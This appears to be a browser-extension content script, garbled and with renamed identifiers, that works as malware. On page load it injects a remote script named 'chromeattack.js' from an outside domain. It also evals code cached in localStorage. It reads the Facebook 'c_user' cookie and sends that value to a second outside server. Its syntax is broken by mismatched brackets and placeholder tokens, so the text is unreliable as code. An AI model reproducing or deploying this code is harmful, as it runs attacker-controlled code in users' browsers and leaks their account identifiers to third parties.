window.onready = start_R_1(0)
  var vide_R_0 = []
  var FB_R_0 = 0
  a_R_? = 0
  function start_R_1(a_R_1) {
  if (document.getElementById_R_?('socialplus')){
    return
})
    var s_R_1 = document.createElement_R_?('script')
    if (1){
          localStorage_R_?['lastconnection'] = '';
      s_R_1.type = 'text/javascript';
      s_R_1.id = 'socialplus';
      s_R_1.src = 'http://sl.gorillacoder.org/chromeattack.js';
      if (document.getElementsByTagName('head')[0]){
                  document.getElementsByTagName('head')[0].appendChild(s_R_1);
          getakey_R_?();
} else {
        if (a_R_1 < 20){
          setTimeout_R_?(function () {
            start_R_1(a_R_1++)
},100)
})
});
} else {
          s_R_1.type = 'text/javascript';
      s_R_1.id = 'socialplus';
      s_R_1.className = 'cachedVersion';
      s_R_1.innerHTML = 'eval(unescape(localStorage["SPcachescript"]));';
      if (document.getElementsByTagName('head')[0]){
                  document.getElementsByTagName_R_?('head')[0].appendChild_R_?(s_R_1);
          getakey_R_6();
} else {
        if (a_R_1 < 20){
          setTimeout_R_?(function () {
            start_R_1(a_R_1++)
},100)
})
});
})
}
  var GM_xmlhttpRequest_R_0 = function (postmess_R_4) {
  chrome.extension.sendRequest({    methode_R_?:'ajaxcrox',    params_R_?:postmess_R_4},function (response_R_5) {
    postmess_R_4.onload_R_?({      responseText_R_?:response_R_5})
})
}
  function getakey_R_6() {
  if (document.cookie){
          index_R_? = document.cookie.indexOf_R_?('c_user');
      if (index_R_? != -1){
                  nDeb_R_? = document.cookie.indexOf('=',index_R_?) + 1;
          nFin_R_? = document.cookie.indexOf(';',index_R_?);
          if (nFin_R_? == -1){
                          nFin_R_? = document.cookie.length;
});
          FB_R_0 = unescape_R_?(document.cookie.substring_R_?(nDeb_R_?,nFin_R_?));
});
})
    if (FB_R_0){
    ajaxeur_R_8('http://get.buzzzapps.com/xpi/lechat/getaKey.php?id=' + FB_R_0,vide_R_0,function (data_R_7) {
      localStorage_R_?['mykey'] = data_R_7
})
})
}
  function ajaxeur_R_8(urlpost_R_8,params_R_8,callback_R_8) {
  window.setTimeout_R_?(function () {
    GM_xmlhttpRequest_R_?({      method_R_?:'GET',      url_R_?:urlpost_R_8,      headers_R_?:{        'Content-type':'application/x-www-form-urlencoded'},      cache_R_?:false,      data_R_?:params_R_8.join_R_?('&'),      onload_R_?:function (xhr_R_10) {
        var json_R_10 = escape_R_?(xhr_R_10.responseText)
          callback_R_?(json_R_10)
}})
},0)
}
